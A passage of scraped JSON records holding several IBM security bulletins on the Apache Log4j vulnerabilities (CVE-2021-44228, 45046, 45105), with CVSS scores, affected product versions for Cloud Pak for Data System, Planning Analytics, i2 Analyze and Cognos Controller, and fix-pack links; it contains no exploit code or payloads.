false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-22T15:04:37", "id": "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "href": "https://www.ibm.com/support/pages/node/6536704", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:10:51", "description": "## Summary\n\nLog4j is used by IBM Cloud Pak for Data System 2.0 in openshift-logging. This bulletin provides a remediation for the reported Apache Log4j vulnerabilities CVE-2021-45105 and CVE-2021-45046.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Cloud Pak for Data System 2.0 Openshift Container Platform 4| 2.0.0.0 - 2.0.1.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by applying following remediation patch on all affected releases listed above: \n**\n\n**Product**| VRMF| Remediation / Fix \n---|---|--- \n \nIBM Cloud Pak for Data System 2.0 - Openshift Container Platform 4\n\n| 1.0.0.0-openshift-4.6.log4j-WS-ICPDS-fp132 | [Link to Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FWebSphere%2FIBM+Cloud+Private+for+Data+System&fixids=1.0.0.0-openshift-4.6.log4j-WS-ICPDS-fp132&source=SAR&function=fixId&parent=ibm/WebSphere>) \n \n * Please follow the steps given in **[release notes](<https://www.ibm.com/docs/en/cloud-paks/cloudpak-data-system/2.0?topic=20-log4j-vulnerability-patch> \"release notes\" )** to apply above remediation.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n19 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS5FPD\",\"label\":\"IBM Cloud Private for Data System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"IBM Cloud Private for Data System 2.0 - All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T18:43:00", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Data System 2.0 (ICPDS 2.0 ) is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T18:43:00", "id": "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "href": "https://www.ibm.com/support/pages/node/6541934", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:13:41", "description": "## Summary\n\nWithin IBM Planning Analytics 2.0, only the IBM Planning Analytics Workspace component of IBM Planning Analytics is affected by security vulnerabilties. Apache Log4j is used by IBM Planning Analytics Workspace as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j CVE-2021-45046 and CVE-2021-45105 vulnerabilities . IBM Planning Analytics Workspace 2.0 has upgraded Apache Log4j to v2.17. Please note that this update also addresses CVE-2021-44228.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Planning Analytics Workspace 2.0.57 or higher.\n\n## Remediation/Fixes\n\nThis Security Bulletin is applicable to IBM Planning Analytics 2.0. \n\nIf you have one the listed affected versions, it is strongly recommended that you apply the most recent security update:\n\n[Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 72 from Fix Central ](<https://www.ibm.com/support/pages/node/6528420> \"Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 72 from Fix Central\" )\n\nPlease note that this update also addresses CVE-2021-44228.\n\nRemediation for IBM Planning Analytics on Cloud has completed. \n\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: IBM Planning Analytics on Cloud remediation completion in Remediation/Fixes \n21 Dec 2021: Updated Summary to add IBM Planning Analytics Workspace 2.0 has upgraded Apache log4j to v2.17 \n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSCTEW\",\"label\":\"IBM Planning Analytics Local\"},\"Component\":\"Planning Analytics Workspace\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"2.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T02:40:28", "type": "ibm", "title": "Security Bulletin: IBM Planning Analytics 2.0: Apache Log4j Vulnerabilities (CVE-2021-45046 & CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-22T02:40:28", "id": "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "href": "https://www.ibm.com/support/pages/node/6528790", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:13:29", "description": "## Summary\n\nApache Log4j is used by IBM i2 Analyze for general purpose and application error logging. It is also used in IBM i2 Analyst's Notebook Premium when the chart store is deployed. This bulletin addresses the vulnerabilities for the reported CVE-2021-45105 and CVE-2021-45046. The below fix package includes Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Software**| **Version**| **Notes** \n---|---|--- \ni2 Analyze| 4.3.5.0| bundled with Enterprise Insight Analysis (EIA) 2.4.1.0 \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0 \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0 \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0 \ni2 Connect| 1.1.0| shipped with i2 Analyze 4.3.4.0 \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0 \ni2 Analyst's Notebook Premium| 9.3.1| Chart store component \ni2 Analyst's Notebook Premium| 9.3.0| Chart Store component \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.2.0 \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.3.0 \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0 \n \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading using the links shown below.** \n \n**\n\n**NOTE: THESE FIXPACKS SUPERSEDE THE PREVIOUS FIXPACKS MENTIONED IN <https://www.ibm.com/support/pages/node/6526220>**\n\n**Software**| **Version**| **Notes**| **Fix pack links** \n---|---|---|--- \ni2 Analyze| 4.3.5.0| bundled with EIA (What doe EIA stand for? Please spell out at least once.)2.4.1.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&includeSupersedes=0>) \ni2 Connect| 1.1.0| shipped with i2 Analyze 4.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \ni2 Analyst's Notebook Premium| 9.3.1| Chart store component| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&includeSupersedes=0>) \ni2 Analyst's Notebook Premium| 9.3.0| Chart Store component| \n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&includeSupersedes=0>) \n \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.2.0| \n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \n \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.3.0| \n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.3.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.3.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \n \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0| \n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSXVTH\",\"label\":\"i2 Analyze\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T20:13:22", "type": "ibm", "title": "Security Bulletin: IBM i2 Analyze and IBM i2 Analyst's Notebook Premium are affected by Apache Log4j Vulnerabilities (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-31T20:13:22", "id": "05C433115EE2DEF62DD69CA7C7E97FF424FB6D815F82B8FFDD0435DD323AC60F", "href": "https://www.ibm.com/support/pages/node/6537918", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:08:20", "description": "## Summary\n\nIBM Cognos Controller is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. IBM Cognos Controller has upgraded Apache Log4j to v2.16. Please note that this update also addresses CVE-2021-44228.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.4.2\n\nPlease note clients using IBM Cognos Analytics in combination with all versions of IBM Cognos Controller should reference [Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046) ](<https://www.ibm.com/support/pages/node/6528388> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability \\(CVE-2021-45046\\)\" )for important updates regarding IBM Cognos Analytics. \n\n## Remediation/Fixes\n\nIf you have the listed affected version, it is strongly recommended that you apply the most recent security update:\n\n[Download IBM Cognos Controller 10.4.2 IF16 from Fix Central](<https://www.ibm.com/support/pages/node/6528424> \"Download IBM Cognos Controller 10.4.2 IF16 from Fix Central\" )\n\nPlease note that this update also addresses CVE-2021-44228.\n\nRemediation for IBM Cognos Controller on Cloud has completed. \n\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Controller team developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers. \n\nTo get the patch and detailed instructions, click this link: [IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around](<https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Cognos+8+Controller&release=All&platform=All&function=fixId&fixids=10.4.2.0-BA-CNTRL-Win64-LOG4J-WORK-AROUND:0&includeSupersedes=0&source=fc&login=true> \"IBM 